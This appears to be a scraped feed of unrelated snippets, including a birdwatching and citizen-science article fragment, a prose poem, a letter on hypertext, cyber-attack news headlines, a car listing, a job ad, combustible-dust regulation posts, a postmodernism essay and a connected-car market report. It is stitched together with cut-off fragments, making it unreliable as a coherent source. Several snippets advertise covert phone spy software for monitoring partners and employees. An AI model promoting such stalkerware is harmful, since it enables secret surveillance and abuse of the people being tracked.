official scientific birdwatchers decided, after much study, that an extinct
bird in Mexico was actually not extinct.

But the amateur birdwatchers had long beaten them to this discovery with
their own online literature. "The birdwatchers were like, 'That's
interesting, but we did that a few years ago,' " one professional
ornithologist told Howe.


Before the 19th century, it was amateurs - often, but not always, from the
aristocracy - who made scientific discoveries, writing to each other to
share knowledge through informal societies like "the Invisible College,"
which later became the Royal Society.

But by the 1800s, universities and their increasingly specialized graduates
were jealous of the competition posed by amateurs, and started to shut them
out - successfully, until recently, when amateurs in fields ranging from
organic chemistry to investigative journalism could once again fairly
compete with the pros.


In science, an Italian homemaker with a heretofore unused organic chemistry
degree can put her talents to use after she puts her kids to bed, helping
companies like Procter and Gamble solve problems their own scientists
couldn't solve through a venture called InnoCentive. Participating companies
pay successful problem-solvers tens of thousands of dollars for their
breakthroughs. Video-renter Netflix has a $1 million reward on offer for
anyone who can increase a component of its customer-service software by 10
          A Sea of Burning Lights   

If only I could freeze them in time, leaving them where they stood, their arms reaching out for their Radio Shack future, their world already turning in dizzying flights of mad multiplication, spinning atop a landfill of computer hardware sunk deep into the corpse of the Earth – a shallow grave called Progress.

Did they know what was soon to transpire?
     Or did they simply engage a future so readily sold to them, willfully ignoring the one they were leaving behind?
     I have to wonder about the range we attain, as we focus forward, our intellects climbing from Barney Rubble’s two-door to Henry Ford’s Model-T, the goal the unreachable engine of our very momentum – that which we so boldly, and clumsily, attempt to overcome – the young giraffe trying to watch itself run away.
     Can we ever truly act in anticipation of tomorrow, when, so compelled by yesterday, we all but forgo today?

Did anyone foresee the world of manufactured communication becoming so thin, so achingly ethereal, that it eventually altogether disappeared – walking out of its dress like Nicole Richie?

Is the future where? Or is it when?

Can it be we implicitly understand that space is time, and vice versa, that to travel from nursery to heresy, from cradle to tomb – is to park the ambulance in the cemetery – the hearse in the delivery room – to picture the gravedigger as stork – to draw Death down the chimney?

Remember that future when phones were still hand-held devices?
     That funny old place where we had voices you could touch and see?
     And hear?

Remember when our information screens sat before us, on a table – in our lap?

That ancient world, where dust settled on the objects of an industry powered by an anorexic Zeus – that light bulb-nosed sprite named Reddy Kilowatt – the jagged ruby line of fire running wire and cable, giving life to dead battery and incubated egg?

Don’t laugh!

I know it sounds funny now, but back then it was terrifying for many, especially the older generation – those who could recall when the computer was but an idea, when television was the future – when offering Eve an Apple was more than just a sales pitch.
     Here was yet another age of great change – one in which they’d have to face the withering look of a tomorrow cold to their embrace – Bette Davis putting on her lipstick – Boris Karloff blowing out a candle.

It was a future quietly announced, in unlikely and stale places, a mystery seen only through the magnified attentions of the lonely numerical men, dressed in their compulsion, the mad grinning Riddlers of math, the boys colored by numbers – those who turned inward and began counting down to infinity – while the rest of us remained addicted to the vast imagined stretches of outer space, conjuring our ancient plays of morality upon a black velvet tableaux pierced by NASA’s torpedoes, a sea of burning lights and falling stars, Andromeda the steersman of our anything but cybernetic journey across, and through, the heavens.

Where were we the day our constructed identities – our words and images and passions – when they all fell away into the White Rabbit’s black hole – the never- ending accumulation of digit that made the world go so flat – every little piggy running off to a future marketplace?

Where were we then?

And when have we gone?
          Electronic Books?   
Stuart Moulthrop

Dear Editors:

Praise to Dave Ciccoricco for a thoughtful, comprehensive, and notably open-minded essay on the contours of “contour” and other vicissitudes of Joyce-Bolter-Bernstein hypertext. I welcome an account that gives both eros and engineering their due; and for all the iconography of cairns and monuments, I’m glad to read something that isn’t a premature death notice.

I do take friendly objection to one point the author makes in closing, citing my opposition to the concept of “electronic books.” Mr. Ciccoricco writes:

“Clearly, ‘electronic book’ is an oxymoron with which the eponymous review journal is quite comfortable - not despite, but because of the new possibilities such combination allows. To see it otherwise is to ignore the extent to which the ‘old’ rhetorics have informed what follows.”

We will differ on this point, I hope amicably. I parse the name “Electronic Book Review” as “Book Review, Electronic.” Mr. Ciccoricco seems to think it means “Review of Electronic Books.” As the editor, of course, he has the casting vote. But what exactly is an “electronic book?” Since most printed books emerge from word processing and digital page production, don’t they all deserve the name? And by the same token don’t we drive electronic cars, eat electronic food, and occasionally, when eros and engineering align, enjoy electronic sex?

To echo an astute question, what would this contour exclude?

Being perhaps more conservative than Mr. Ciccoricco, I prefer to let books be books and cybertexts be whatever they turn out to be. Yet this scruple does not exclude conjunction. A hypertextual review of books is a fine thing indeed, or so EBR has proved. Likewise consider, arguably one of the most valuable uses of node-link technology - a hypertext whose nodes are books. The new does not erase the old.

Can we depend upon the converse, however? Mr. Ciccoricco says “[t]he conventional wisdom of print has never threatened to occlude the literary creativity of a digital age…” True, the Print Cabal has not yet slapped me with a restraining order. But how was it that a certain celebrated electronic magazine declined to publish Michael Joyce’s Twelve Blue for fear of disorienting its readers? What became of the website supporting the hypertexts excerpted in the Norton Anthology of Postmodernist Fiction? Why does no corporate publisher offer a line of hypertexts? To say nothing of certain book critics who write for less enlightened publications than EBR. Here I’m afraid I must differ on the facts. Electronic texts have indeed been marginalized, excluded, and misrepresented by leading institutions of print culture.

Indeed, in what media theorist Daniel Downes calls the “New Media Order” we are seeing a steady reassertion of old-media models (e.g., in digital music distribution) where once were stronger openings for change. As Bob Roberts always says, times are changing back. Knowing that “conventional wisdom” does indeed impede new ideas, I think it’s especially important to maintain our differences. I’ll continue to like my books printed, thanks, and to distinguish strongly between print and other media.

This is not to suggest, however, that book people and computer people can’t get along. Indeed, Mr. Ciccoricco’s wise and generous essay confirms the possibility. With my grumbling, also my thanks.

Stuart Moulthrop

          Cyber Storm III global cybersecurity exercise is underway!   
In places like Arlington, Va.; Washington, D.C.; across the U.S. and around the world, a global cybersecurity exercise is underway designed to test the limits not only of the "network of networks," but the ingenuity of the people charged with protecting it.
          US Led Militarization of the European Union: NATO Provides Pentagon Nuclear, Missile And Cyber Shields Over Europe   
          Hackers In Epaulets: A Challenge To The Consensus on Russian Interference in the 2016 Election?   
Given the confused jumble of Russian cyber warriors revealed by the Moscow and US indictments, I doubt that the intelligence community can find reliable and balanced sources to cut through all the infighting and rivalries and pent up revenge motives.
          2010 GMC Terrain SLE-2 - $CALL   

Cyber Grey, 134,610 KM, 4-door, Quesnel, BC

Used 2010 GMC Terrain SLE-2 for sale in Quesnel, BC

          Cyber attack continues its destructive world tour   
The cyber attack that started Tuesday is wreaking havoc across the globe Wednesday, crippling thousands of computers, disrupting operations at ports from Mumbai to Los Angeles and halting production at a chocolate factory in Australia.

          Cyber attack hits Maersk, BNP Paribas & others   
A major cyber attack, believed to have first struck in Ukraine, has continued to cause havoc around the world, cripppling computers or halting operations at port operator Maersk, the property arm of French bank BNP Paribas and a Cadbury plant in Australia. Kate King reports.

          NSA: U.S. Must Secure the Internet   
According to National Security Agency (NSA) Director Gen. Keith Alexander, the United States federal government has the overarching duty and responsibility in securing the Internet to safeguard against cyber-criminal activities.
          Cyber Warfare: US Military Hackers and Internet Spies    
          Benedict Superman

In this week's show:

Expat Superman
Cyberpunk Authors
Equations Of Life

Continue the discussion in our forums!
Music for the show provided by George Carpenter.

          Cyberchase Cartoon Photos And Wallpapers   
          Anly Forensic Intrusion Lead   
ManTech International Corporation - Springfield, VA - implementation and transition to operations of delivered cyber tools. Analysts assigned to the Tier 3 team perform the following: Conduct forensic... acquisition and analysis of cyber security incidents. Conduct forensic acquisition and analysis of cyber security incidents. Perform "Hunt Operations...
          Cyber Security Network Forensic Analyst   
McDonald Bradley Inc - Jersey City, NJ - . Currently, ManTech is seeking a motivated, career and customer oriented Cyber Security Network Forensic Analyst to join our team in the Jersey City.... This position will work with internal anti-virus teams and technical teams to validate and remediate the threat. The role of the Forensic Analyst...
          Global ransom virus buffets Mumbai port   
A new cyber attack that originated in Ukraine and spread to other countries hit operations today at one of the three terminals of Jawaharlal Nehru Port Trust, India's largest container facility, near Mumbai.
          Comment on ThinkHero Comic Con 2011 Meetup! by Cyberlink Power   
Excellent and nice article. when user want to get important information then visit our site.
          Comment on ThinkHero Comic Con 2011 Meetup! by Cyberlink Power2Go   
Nice post! Thanks a lot for the kind of perfect topic.I like your post. Thanks for sharing
          Dances With Wolframs   

This week we're doing something a little different, as Cooter and I do the show sans Lando. We cover quite a bit of ground, starting with Ron Paul getting mighty uncomfortable with Sasha Cohen and whether ignorance is ever understandable. From there we move into some more scientific realms, starting with Cooter's ideas on clean fuel before moving into the potentially huge Wolfram Alpha project. After that, we talk another innovation that has some fantastic promise: Glasshouse. All this talk about the future and amazing technology on the horizon naturally leads to some musing on the stunning things we have with us right now. Flying cars, the commonality of touch screens, toy brain scanners...the future is now baby! Enjoy!

Opening Music: "Alive WIP v2" by George Carpenter
Closing Music: "Blau.ton" by Rauschwerk

          Senior Automation Systems Engineer / Request Technology - Jacqueline White / Reston, VA   
Request Technology - Jacqueline White/Reston, VA


Seeking a Sr Automation Systems Engineer

Well known company in Reston, VA seeking a Sr Automation Systems Engineer role. If you like a culture where you will stretch your limits and give you exposure to cutting edge technologies, you're in luck.

If nothing stands between you and your love for vRealize, vRO and VMware technologies, don't be coy and wait three days to call us. We want to hear from you now! Email your resume to me: (see below)

What our client wants you to do aka responsibilities

5-7 years of vRealize, automation development, configuration, VRO Workflow, VMWare technologies, vCloud air, JAVA, Struts, MVC frameworks.

Who you are

Typically has 5-7 years related experience Bachelor's degree in Computer Science or Information Systems or equivalent work experience

Ability to guide automation team members.

Excellent knowledge of vRealize Automation and ability to create work flows

knowledge and development skills in Service Now Excellent Scripting skills (Example: Shell Scripts and bladelogic)

Experience and knowledge in creating Blueprints, publishing catalogs, creating and configuring VRO/workflows, vRO configurations/integration with external systems/3rd party tools such as Infoblox serviceNow, checkpoint TAM, Sailpoint, cyberark etc

knowledge in other VMWare technologies Knowledge in chef, puppet other similar tools.

Coding experience in Java, JSP, Servlet, J2EE and JavaScript Excellent coding and GUI skills Development of Realize Automation (VRA), VCloud air, SharePoint, Industry Cloud automation orchestration tools is a plus

Strong organizational and communication skills

Expert in web technologies such as Java, Struts and MVC frameworks.

In depth understanding of industry best practices, Legacy browser challenges and emerging technologies will set this candidate apart.

This candidate should lead group of developers, generating ideas, designing solutions and building them.

The team works closely with or business stakeholders so effective coding skills, verbal and written communication is a necessity.

Work with stake holders to provide delivery schedule meeting customer satisfaction.

You also meet most (if not all) of the following requirements: 

Responsibilities include:

Define and implement efficient end-to-end provisioning Automation solutions

Serves as a subject matter expert for automation and orchestration

Supports the existing Automation Portals, provisioning scripts. Identify the automation orchestration related opportunities throughout the organization

Independently leads the design of automation solutions to include hardware platforms, services, and operation systems.

Lead development of Java based Infrastructure Self-service Portals with a team of Developers, Engineers and Architects.

Provide Architecture solution to develop Self Service Portal and Infrastructure automation.

Create Automation solutions using VMware technologies, Apache, Tomcat, WebLogic and SOA.

Role will be accountable for working multiple internal departments to in delivering enterprise automation solutions.

Work with development teams for develops Infrastructure web applications using COTS products or JSP, Servlet and XML.

Conduct POCs to demo new ideas and help solidify technical direction.

Work with internal as well as external resources to achieve project goals.

Work in a collaborative development environment, providing assistance & technical guidance to less experienced team members

Who the Company is

Our client is a large company with a very talented group of people, where they maintain a friendly environment where people really want to work.

If this sounds great to you, come join us. Please email me your resume (see below)

Employment Type: Permanent
Work Hours: Full Time

Pay: $120,000 to $130,000 USD
Pay Period: Annual

Apply To Job
          31 - [GPT Blogs] Cybergpt Top GPT PTC Websites around the   
We are a small Rant blog on gpt websites :) the good the bad the ugly
          Invisible War   

This week we're doing a little viewer mail before delving into our topic: the nature of war within cyberspace. So much of our lives tied to the internet, and in this increasingly interconnected society what does conflict consist of when the battlefield is entirely virtual? Is there any such thing as war online, or is it more like a giant game of Battleship between faceless combatants?

Opening Music: "Fire In The Sky" by Dave London
Closing Music: "ET" by Peplab


          Comment on 2016年网络安全法 by Revue de presse du 01 juin 2017 - CEFC   
[…] if the Chinese authority requests. The English version of the Cybersecurity Law can be found here by China Law Translate. AFP noted that the law also prohibits posting anything which demages […]
          Comment on 2016年网络安全法 by Press Highlights 01 June 2017 - CEFC   
[…] if the Chinese authority requests. The English version of the Cybersecurity Law can be found here by China Law Translate. AFP noted that the law also prohibits posting anything which demages […]
          Comment on 网络产品和服务安全审查办法(试 行) by Microsoft released a new version of Windows that’s tailor-made for the Chinese government – Quartz | Stylish gadget shop   
[…] provision to China’s 2016 Cybersecurity Law, set to be implemented on June 1, states that reviews will screen for risks of “network products and services” potentially “being […]
          Comment on 2016年网络安全法 by Microsoft released a new version of Windows that’s tailor-made for the Chinese government – Quartz | Electronic Hot Sale   
[…] provision to China’s 2016 Cybersecurity Law, set to be implemented on June 1, states that reviews will screen for risks of “network products […]
          Comment on 2016年网络安全法 by Microsoft released a new version of Windows that’s tailor-made for the Chinese government – Quartz | You Buy Computers   
[…] provision to China’s 2016 Cybersecurity Law, set to be implemented on June 1, states that reviews will screen for risks of “network products […]
          Comment on 2016年网络安全法 by Microsoft released a new version of Windows that’s tailor-made for the Chinese government – Quartz | Stylish gadget shop   
[…] provision to China’s 2016 Cybersecurity Law, set to be implemented on June 1, states that reviews will screen for risks of “network products […]
           Proposed Combustible Dust Bill Relationship to OSHA Regulations    
Proposed Combustible Dust Legislation H.R. 691,Worker Protection Against Combustible Dust Explosions and Fires Act of 2013. Presentation illustrates relationship of proposed combustible dust bill with OSHA regulations. Approximately 40% of the requirements are mirrored from content in the OSHA Fire Prevention Plan 1910.39 in addition to approximately 50% of content analogous to OSHA's Process Safety Management 1910.119 regulations.

Many of the NFPA combustible dust standards also include elements of Process Safety Management (PSM) such as management of change (MOC), accident investigations, contractor training, etc. Additionally elements in the requirements of the proposed bill include: Hazard Assessment 1910.132, Hazard Communication (HazCom) 1910.1200, Process Safety Management (PSM) 1910.119, Lock-out/Tag-out (LOTO)1910.147, and Hot Work 190.252.

The proposed reintroduced legislation fails to address in the "findings" the importance of training, education, outreach, inspections, and enforcement at the local jurisdictional level with the I-Codes such as the International Building Code and International Fire Code which reference the NFPA combustible dust standards. There exponentially  more local building and fire inspectors conducting plan review, permit approval, and inspections than the limited resources of OSHA inspectors working out of distant area offices. Fires can never be effectively regulated at the federal level since fire prevention and protection is a local issue. A cohesive collaboration between local, state, and federal agencies would be a equitable solution in addressing the contentious and complex subject of combustible dust fire and explosion hazards in H-2 High-Hazard occupancies which appear to many as benign deflagration hazards with the continued occurrence of "near misses" throughout all sectors

YouTube video on slide #2 is Representative George Miller (D), Chairman of the Education and Labor Committee, making a statement during floor debate on HR 5522, the Worker Protection Against Combustible Dust Explosions and Fires Act, on April 30, 2008. The bill passed in the House of Representatives April 30, 2008, 6:56 p.m. with a 247/165 simple majority vote but was never passed by the Senate.

          Building Signage Communicating Hazards Will Save Lives   
Truss Signage

International Fire Code (2012) Appendix J - Building Information Sign, provides excellent guidance in communicating high-hazard occupancies to fire crews responding to combustible dust related fires and explosions. Many fire departments are not aware of the inherent special risk of a HazMat nature when responding to these types of incidents. The situation is especially critical with lack of resources for many jurisdictions in conducting pre-site visits as outlined in NFPA 1620 Standard for Pre-Incident Planning.

Truss signage,” is an excellent example currently implemented in numerous jurisdictions throughout the nation in preventing injures and fatalities of fire-fighters due to truss system failures. Similar signage as referenced in the International Fire Code (2012) and NFPA 704 will effectively communicate hazards to fire departments responding to facility combustible dust related incidents.

“Fire Chief did not receive an MSDS sheet from facility until the next day. Fire Chief added that if he had the MSDS sheet at the time of the incident his tactical decisions would have been different.” –excerpt accident report. This example illustrates if High-Hazard H-2 occupancy signage was affixed to the outside of buildings, fire crews would know upon arriving at the fireground that deflagration hazards are present. NFPA 704 signage produces similar results. A flammable vapor cloud explosion (VCE) is not much different than the severity of a wood dust deflagration as both involve damaging pressures waves followed by slower moving flame fronts of destructive flammable gases.
          The Postmodern Age   
For my first official post here on this lovely site I wanted to establish to our listeners and now readers the facets of the age we are said to be living in, which is that of the Postmodern age. Since my forte is literature, I sought to explain the idea of postmodernism in reference to literature. But have no doubt that these idea can be attributed to all aspects of the current culture that we inhabit. "Why are you telling us this Lando?" you are no doubt asking. Simple. We are living in an age akin to cyberpunk. Cyberpunk has been considered postmodern. We are living in a postmodern age, and we should really know just what in hell that means. Here is my attempt at it, I hope it makes sense. Don't worry, I will probably never unleash such a long post on you all as this. Buckle up, lock and load.

      I take on the precarious task then of explaining what Postmodernism is. It's not an easy task by any means, because Postmodernism is itself a term in constant flux. At the root, Postmodernism eliminates the final say of the critic and empowers the individuals opinion.  This means the reader is correct dependent on his or her perception.  Progressing out from literature to nearly every walk of life, Postmodernism has been referred to as a hydra which straight forward philosophical thought will never be able to cut down. As soon as you define it in one genre or art form, it evolves into something else, somewhere else. There are themes however which become prevalent in Postmodernism which I will try to explain.

      One of the first themes that comes to mind is that of how the importance of "high art" is broken down. By "high art" I mean the classics: the paintings of Michelangelo; the music of Bach; the writing of Hawthorne, etc. In the past, the critics had a strong control of what was and what was not considered "high art", critics could distinguish and attribute worth, deciding what deserved hanging in a museum. With Postmodernism, the critic has been neutered. The state of art is determined by the individual, and everything has a subjective value whether it is a painting of the Virgin Mother done in menstrual blood or the works of Norman Rockwell. "High art" and popular culture have collided violently into each other, shading and sometimes eliminating the boundary.

      The next theme I'd like to discuss has to do with something called a Simulacra. Jean Baudrillard is a phenomenoligist philosopher who proposed the theory of the Simulacra. A simulacra is a simulation of the ideal apple; a thing that is more real than the thing it represents. For example, when one thinks of an apple, they think of a shiny red apple with waxy skin that you can almost see your face in. When given a real apple right off the branch, it is often not so shiny or well presented. In fact, it can look kind of ugly and unappetizing. In this, the idea of the apple is the simulacra; we feel it is more real than the reality that has been provided to us. Another example would be when we go out for Mexican food. What passes for Mexican food in the United States is really just an idea of what Mexican food should be like; it's a simulacra of Mexican food. For those of us who have actually traveled to Mexico, we know that the reality is very different than what you most often end up with in the US. That said, in the realm of the Postmodern, we are presented with the Third Order of the Simulacra.

      In the Third Order of the Simulacra, there is no reality. The public is presented with a hyperreality that is completely fictional. A good example of this is in the way movies are being made now with actors walking across massive green screen sets, where in the scenery is added later. The hyperreality would be the scenery which technology looks so real and yet is completely made up by the special effects artists. The places depicted don't exist anymore or, in other instances, never have. This phenomenon evolves further by the creation of digital, who act alongside live actors as if they were actual beings. Gollum in the Lord of the Rings Trilogy and Jar Jar Binks from Star Wars are perfect examples of this in film. These characters do not exist, they are constructed from programming, and yet we act as if they are living, breathing actors. The Japanese have their own version of this in their Idorus. An Idoru is a made-up pop star, usually animated, that is presented as if it were a real pop star, selling music and movies. The closest thing we have in the United States to that is the pop band, The Gorillaz. The Gorillaz are a band which is made up of constantly changing roster of musicians who are fronted by an animated cartoon band that always remains the same.

      Another theme in Postmodernism is the way style takes precedence over substance. A novel is written which has no plot and no arch, but the manner in which it is written is so unique that it is trumped as genius and put on a pedestal. In the age of Postmodernism, style is the draw. Style makes things sell, style make actors bankable, style is what people want to buy in order to become stylish and "in." In the age of postmodernism, the cover of the book can matter more than what is behind it.

      In Postmodernism there is a great deal of recycling of old ideas. Whereas in Modernism a great emphasis was made on new ideas and stories, Postmodernism is conforming to the mold; the basic structure us coupled with a formulaic idea to repeat the original genius:  How many times has Frankenstein been rewritten and refilmed in some slightly different way? Mary Shelly, Dean Koontz, Robert Deniro. Shakespeare has been reconceived in the modern day, the future and across a multitude of cultures. Why is it there are no new Shakespearian-level works? As we see in the movie world, there are more remakes than new ideas. Characters such as Superman and Batman are made into countless movies while also heading up comic book series.  The series are without new ideas; the writers are afraid what may happen if they kill their characters off and then have nothing to follow with. Heroes used to die, now they just keep going till we get bored with them.

      The last theme I would like to explore is that of Postmodernism's lack of metanarrative. The French philosopher and literary theorist, Jean-François Lyotard, has said of Postmodernsim in a popular quote, "Simplifying to the extreme, I define postmodern as incredulity towards metanarratives."  (1984) A metanarrative can be explained as a story with a point or lesson; it's a story that tells a vast vision of human history. Sometimes a record of human events, other times the tale of one man's progression toward knowledge, the metanarative has a very important place in human social and literary history, a place that Postmodernism ignores or outright attacks. The postmodernists are skeptical of the lessons a metanarrative wants to teach and therefore they disregard it, then attempt to discredit it, and finally they ignore it. In this, no new metanarratives are being written; writers aren't concerning themselves with those types of tales. And when they do, it is only to display them as parody.

          Living In The Cyberpunk Age   

Tonight is the first bicoastal edition with Lando and myself taking a look at cyberpunk and its effect on our modern lives.


There’s a funny story about Joe and I from the first year of our having met. Joe lived in a college suite with some friends of mine while I was living in blessed isolation in the single rooms across campus. I was working on my BA with a double major in English and Psychology and hadn’t yet discovered the desire to learn everything, though it was bubbling. I did however discover a rather comprehensive personality test in the Psychology Office’s library, which, I then administered to most of my friends in Joe's suite. Afterward, I administered the test to myself, waiting to score them all together so that I wouldn’t slant my own answers based on subconsciously desired results.

After several hours of crunched numbers, I ended up with a set of results for my friends and Joe. What I saw was a group of people with very common personality traits, you might almost call them stock personality types, which make up most of the population. What I had not counted on was that Joe and I would fall into a personality type that was shared by no one else in the suite, and in fact only shared with three to five percent of the population. It was a leadership type, a personality that refused to take orders blindly and which sought to instead discover its own path. What made it funnier was that Joe and I were counter point inside the type. Joe was a leader who preferred to lead from the shadows and remain out of the spotlight, effecting control of the world without demanding recognition. I was a leader who did not want control but through effect of personality drew people to me and created tribes. A drastic simplification of the types of course, but the point was that I had met someone like me, just on the opposite end of the pendulum.

This show is the interest on years of friendship between two people of a less common personality type who refuse to be led and instead lead themselves. Joe went the way of Art and I went the path of English and Psychology. I have a MA in Writing, and MA in Psychology, and a MA in Literature. I believe that knowledge is the greatest wealth and would keep myself in education forever if I could. Instead I read a lot and subject myself to college courses on tape in a constant struggle to learn, well, everything.

I was raised on Fantasy and Led Zeppelin and matured into Cyberpunk and Techno. I am the child of immigrants who themselves stepped out of the common roles their parents expected from them, starting a tradition of rebellion. These days I read every genre but my love of the sea is always the seas of Science-Fiction, or as some have started calling it, Speculative Fiction. Beyond my education and reading I don’t have much more to say, I never really liked the idea of bios and the like. I have been writing since I was eleven, and one day I do hope to touch the minds of others the way my mind was touched at a young age, starting me off into the lands of mind and question. Gibson’s Neuromancer was more than just futurist crime fiction, it taught a boy like me that life could be very different from what the everyday dictated.

I hope this gives our listeners some better ideas of their hosts. Oh, and one more thing, I am confident that Theodore Roosevelt would kick Ernest Hemingway’s ass in an old style fistfight. That said, enjoy the show and thanks for your time.

          Comment on Zillow Ain’t Got Nothin’ On Cyberhomes, So We Got The Latter by ScottLar   
          CyberSecurity Engineer - Black Box Network Services - Lawrence, PA   
This position is for a senior engineer in the CyberSecurity department. The role will be responsible for designing, building, and participating in core
From Black Box Network Services - Wed, 07 Jun 2017 20:18:04 GMT - View all Lawrence, PA jobs
          Cyber Analyst - GlaxoSmithKline - Upper Providence, PA   
Research and analyze security threat intelligence from a variety of sources. 2-3 years of relevant IT experience....
From GlaxoSmithKline - Tue, 06 Jun 2017 00:57:06 GMT - View all Upper Providence, PA jobs
          Joint Newcomer Orientation (JNO) Specialist - Clear Resolution Consulting, LLC - Kunia, HI   
Clear Resolution Consulting, LLC provides Intelligence Analysis, Business Management, Cyber Operations, Special Operations and Information Technology Consulting...
From Clear Resolution Consulting, LLC - Wed, 08 Mar 2017 06:52:17 GMT - View all Kunia, HI jobs
          Best Free Cell Phone Spy Software   

Best Free Cell Phone Spy Software As the reliance on cellular technology has increased, the level of insecurities and cyber crimes has also been on the rise. For those who wish to keep a tab on the overall activities of their wards or partners as well as professional employees are highly recommended to resort to […]

The post Best Free Cell Phone Spy Software appeared first on .

          Cell Phone Spy Software Call Recording With The Support Of Spy Software   

Cell Phone Spy Software Call Recording With The Support Of Spy Software For ethical monitoring and cellular hacking, there are several active software applications that have been established which in a way support the urgent needs of service users. If you are a parent then you are bound to be familiar with cases of cyber […]

The post Cell Phone Spy Software Call Recording With The Support Of Spy Software appeared first on .

          ExactSpy-The Best Free Spyware For Cell Phones   

The best free spyware for cell phones that are designed to track cyber related crimes and activities   In order to address security concerns, several kind of software has been developed in recent times. With increased reliance and popularity of technology, cyber crimes have also increased to a great extent. Most of the suspects and […]

The post ExactSpy-The Best Free Spyware For Cell Phones appeared first on .

          Mobiele ransomware: een groeiende dreiging    
Cybercriminelen achter mobiele ransomware zijn hun aanvallen aan het richten op welvarende landen. Ontwikkelde markten hebben niet alleen een hoger inkomstenniveau, maar ook een meer geavanceerde en op ruimere schaal gebruikte mobiele en e-betalingsinfrastructuur.

from DAHBOO77:

          202位:【A】速乾軽量!バスローブ 送料無料 今治産 Fit-Useバスローブ【あす楽対応】蛍光染料不使用 全6種フィットユース※ラッピング別売ひよこクラブ掲載速乾 ガーゼ 薄手 レディース ママ 内祝い 出産祝い ベビー   
【A】速乾軽量!バスローブ 送料無料 今治産 Fit-Useバスローブ【あす楽対応】蛍光染料不使用 全6種フィットユース※ラッピング別売ひよこクラブ掲載速乾 ガーゼ 薄手 レディース ママ 内祝い 出産祝い ベビー
タオルショップ ブルーム



          Connected Car Market Segments by Application, Connectivity Solution & Region : Technology Innovation, Advances, Global Industry Analysis, Market Size, Growth & Outlook (2016-2020)   

Latest market research report and forecast on "Global Connected Car Market (by Application, Connectivity Solution & Region): Industry Analysis & Outlook (2016-2020)"

Albany, NY -- (SBWIRE) -- 06/28/2017 -- Connectivity is the ability to exchange information by electronic means. A connected vehicle enables a growing number of features and services that make the driving experience safer, more convenient, more compelling, more fun, and less costly. The features of connected cars includes emergency and roadside assistance, navigation and traffic/re-routing services, stolen vehicle recovery, hands free calling, Wi-Fi hot spots, infotainment apps, vehicle performance alerts, and remote vehicle controls.
"Connected Car" is generally referred to the component, which consists of both the physical hardware and the software, which is essential for internet-based services. The hardware generally consists of head unit display, human machine interface (HMI) and a telematics control unit (TCU).

The global connected car market is expected to see innovation driven growth in the coming years as the market will experience technological explosion. The growth of the market will be supported by demand for safety & driving assistance, which involves systems that allow drivers to reach their destination safely in the least possible time, at reasonable cost along with optimal fuel consumption, thereby shooting the demand for connected cars.

Get The Sample Copy Of This Report @

The key factors driving growth of the market includes increasing global telematics market, expansion of fleet management, favorable government policies, escalating smartphone shipments and increasing youth population. However, there are certain factors hindering the growth of the market like cyber security concerns, increasing complexity, cost optimization. The major trends featuring the market includes rise in the volume of DSRC technology installations, increasing adoption of new technologies, increasing demand for connectivity, rise in e-call systems and many more trends have been covered in the report.

The report "Global Connected Car Market (by Application, Connectivity Solution & Region): Industry Analysis & Outlook (2016-2020)" offers an in-depth analysis of the overall market. It covers the regional and global aspect of the market. Competition is concentrated in the hands of few top notch companies, of which Apple, AT&T Inc., Audi and Alcatel Lucent have been covered in the report.

Table of Content

1. Market Overview
1.1 Connected Car
1.2 Connected Car by Application
1.3 Connected Car by Service
1.4 Connectivity Solutions

View More :

2. Global Connected Cars Market
2.1 Global Connected Cars Market by Value
2.2 Global Connected Cars Market Forecast by Value
2.3 Global Connected Cars Market by Shipment Volume
2.4 Global Connected Cars Market Forecast by Shipment Volume
2.5 Global Connected Cars Market by Region
2.6 Global Connected Cars Market by Application
2.7 Global Connected Cars Market Forecast by Application
2.8 Global Connected Cars Market Volume by Connectivity Solutions

3. Regional Market Analysis
3.1 North America
3.1.1 North American Connected Cars Market by Value
3.1.2 North American Connected Cars Market Forecast by Value
3.1.3 North American Connected Car Market by Shipment Volume
3.1.4 North American Connected Car Market Forecast by Shipment Volume
3.1.5 North American Connected Car Market by Application
3.1.6 North American Connected Car Market Forecast by Application
3.1.7 North American Connected Car Market Volume by Connectivity Solution
3.1.8 North American Connected Car Market Penetration Rate
3.2 Europe
3.2.1 European Connected Car Market by Value
3.2.2 European Connected Car Market Forecast by Value
3.2.3 European Connected Car Market by Shipment Volume
3.2.4 European Connected Car Market Forecast by Shipment Volume
3.2.5 European Connected Car Market by Application
3.2.6 European Connected Car Market Forecast by Application
3.2.7 European Connected Car Market Volume by Connectivity Solution
3.2.8 European Connected Car Market by Penetration Rate
3.3 Asia Pacific
3.3.1 China's Connected Car Market by Value
3.3.2 China's Connected Car Market Forecast by Value
3.3.3 China's Connected Car Market Volume by Connectivity Solution
3.3.4 China's Connected Car Market by Penetration rate
3.3.5 Japan's Connected Car Market by Value
3.3.6 Japan's Connected Car Market Forecast by Value
3.3.7 Japan's Connected Car Market by Application
3.3.8 Japan's Connected Car Market by Penetration Rate
3.3.9 India's Connected Car Market by Value
3.3.10 India's Connected Car Market Forecast by Value
3.3.11 India's Connected Car Market by Application
3.3.12 India's Connected Car Market by Penetration Rate

Send an Enquiry :

4. Market Dynamics
4.1 Key Trends
4.1.1 Rise in Volume of DSRC Technology Installations
4.1.2 Increasing Adoption of New Technologies
4.1.3 Increasing Demand for Connectivity
4.1.4 Adoption of Large Scale Investments in Infrastructure
4.1.5 Demand for E-Call Systems
4.2 Growth Drivers
4.2.1 Increasing Global Telematics Market
4.2.2 Increasing Penetration Rate of Vehicles Connected to Internet
4.2.3 Expansion of Fleet Management Market
4.2.4 Rise in Smartphone Shipments
4.2.5 Growth due to Key Regulations and Policy Initiatives
4.2.6 Growing Youth Population
4.3 Challenges and Issues
4.3.1 Cyber Security Concerns
4.3.2 Increasing Complexity
4.3.3 Cost Optimization

5. Competitive Landscape
5.1 Global Connected Cars Market Competition
5.1.1 Revenue Comparison
5.1.2 Market Cap Comparison

6. Company Profiles
6.1 Apple Inc.
6.1.1 Business Overview
6.1.2 Financial Overview
6.1.3 Business Strategies
6.2 AT&T Inc.
6.2.1 Business Overview
6.2.2 Financial Overview
6.2.3 Business Strategies
6.3 Audi
6.3.1 Business Overview
6.3.2 Financial Overview
6.3.3 Business Strategies
6.4 Alcatel Lucent
6.4.1 Business Overview
6.4.2 Financial Overview
6.4.3 Business Strategies

For more information on this press release visit:

Media Relations Contact

Mr Nachiket
Business Head
Telephone: 518-621-2074
Email: Click to Email Mr Nachiket

          Seven Years of Serving and Studying the Legal Needs of Digital Journalism   

